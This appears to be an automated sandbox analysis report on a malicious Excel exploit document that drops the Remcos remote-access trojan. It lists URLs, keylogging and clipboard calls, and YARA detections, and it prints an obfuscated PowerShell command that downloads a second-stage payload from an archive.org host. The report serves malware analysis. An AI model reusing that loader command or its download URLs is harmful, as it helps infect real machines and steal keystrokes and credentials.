                  Source: RegAsm.exe, 0000000F.00000002.447784397.0000000000154000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net0
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: powershell.exe, 0000000C.00000002.438679378.0000000002359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
                  Source: powershell.exe, 0000000C.00000002.441878558.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441938406.0000000004FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
                  Source: powershell.exe, 0000000A.00000002.443131890.00000000024C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 0000000F.00000002.448125301.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvA42C.tmp.15.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: zhort.de.url.3.drString found in binary or memory: https://zhort.de/
                  Source: UlEYs1.url.3.drString found in binary or memory: https://zhort.de/UlEYs1
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxString found in binary or memory: https://zhort.de/UlEYs1f
                  Source: ~DF12645870096F092E.TMP.0.dr, F9430000.0.drString found in binary or memory: https://zhort.de/UlEYs1yX
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000014_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,14_2_0040A41B
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Microsoft Office drops suspicious files
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\UlEYs1.urlJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\zhort.de.urlJump to behavior
                  Very long command line found
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9398
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9398Jump to behavior
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_0041812A
